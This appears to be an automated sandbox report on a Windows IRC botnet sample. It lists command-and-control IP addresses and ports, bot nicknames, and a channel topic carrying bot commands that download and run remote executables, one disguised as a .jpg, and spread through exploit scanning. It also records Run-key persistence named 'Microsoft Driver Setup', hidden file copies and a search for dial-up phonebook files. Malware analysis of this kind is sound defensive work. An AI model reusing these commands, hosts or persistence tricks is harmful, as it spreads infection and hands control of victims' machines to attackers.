www.MSNAREA.COM 173.208.34.249
membres.lycos.fr
membres.lycos.fr 213.131.252.251
membres.multimania.fr
membres.multimania.fr 213.131.252.251
Download URLs
http://213.131.252.251/proxyworld/azenv.php (membres.lycos.fr)
C&C Server: 173.208.34.249:80
Server Password:
Username: SP3-943
Nickname: [N00_DEU_XP_7839707]_CHAR(0x08)_ë@
Channel: (Password: )
Channeltopic:
C&C Server: 173.208.34.249:81
Server Password:
Username: SP3-720
Nickname: [00_DEU_XP_4068211]
Channel: #xx32 (Password: )
Channeltopic: :.asc -S -s |.http http://94.76.194.116/32.exe |.asc exp_all 10 5 0 -c -e |.asc exp_all 10 5 0 -b -r -e |.asc exp_all 5 5 0 -c |.down -S |.down http://94.76.194.116/brown1.jpg c:f4j7y7b7m9p4.exe c:f4j7y7b7m9p4.exe -r -h
Outgoing connection to remote server: membres.lycos.fr TCP port 80
Registry Changes by all processes
Create or Open
Changes HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Microsoft Driver Setup" = C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\xfgnp.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run "Microsoft Driver Setup" = C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\xfgnp.exe
Reads HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "DefaultAuthLevel"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile "EnableFirewall"
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "10"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders "SecurityProviders"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "TokenSize"
File Changes by all processes
New Files \Device\Tcp
\Device\Ip
\Device\Ip
C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\xfgnp.exe
\Device\RasAcd
C:\Windows\logfile32.txt
Opened Files \\.\PIPE\lsarpc
c:\71a95d2e81c84b3560ce0714195cc635
\\.\Ip
C:\WINDOWS\Registration\R000000000007.clb
\\.\PIPE\lsarpc
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp
\\.\PIPE\lsarpc
C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\xfgnp.exe
\\.\Ip
C:\Windows\logfile32.txt
\\.\PIPE\ROUTER
\\.\PIPE\lsarpc
c:\autoexec.bat
Deleted Files
Chronological Order Get File Attributes: C:\WINDOWS Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Get File Attributes: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\desktop.ini Flags: (SECURITY_ANONYMOUS)
Open File: c:\71a95d2e81c84b3560ce0714195cc635 (OPEN_EXISTING)
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Get File Attributes: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\xfgnp.exe Flags: (SECURITY_ANONYMOUS)
Copy File: c:\71a95d2e81c84b3560ce0714195cc635 to C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\xfgnp.exe
Set File Attributes: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\xfgnp.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp ()
Find File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\xfgnp.exe
Get File Attributes: C:\WINDOWS Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Get File Attributes: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\desktop.ini Flags: (SECURITY_ANONYMOUS)
Open File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\xfgnp.exe (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp ()
Find File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\xfgnp.exe
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Get File Attributes: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\xfgnp.exe Flags: (SECURITY_ANONYMOUS)
Set File Attributes: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\xfgnp.exe Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Copy File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\xfgnp.exe to C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\xfgnp.exe
Set File Attributes: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\xfgnp.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Create/Open File: \Device\RasAcd (OPEN_ALWAYS)
Open File: C:\Windows\logfile32.txt (OPEN_EXISTING)
Create File: C:\Windows\logfile32.txt
Open File: \\.\PIPE\ROUTER (OPEN_EXISTING)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Get File Attributes: c:\autoexec.bat Flags: (SECURITY_ANONYMOUS)
Open File: c:\autoexec.bat (OPEN_EXISTING)
Find File: C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Microsoft\Network\Connections\Pbk\*.pbk
Find File: C:\WINDOWS\system32\Ras\*.pbk
Find File: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\Microsoft\Network\Connections\Pbk\*.pbk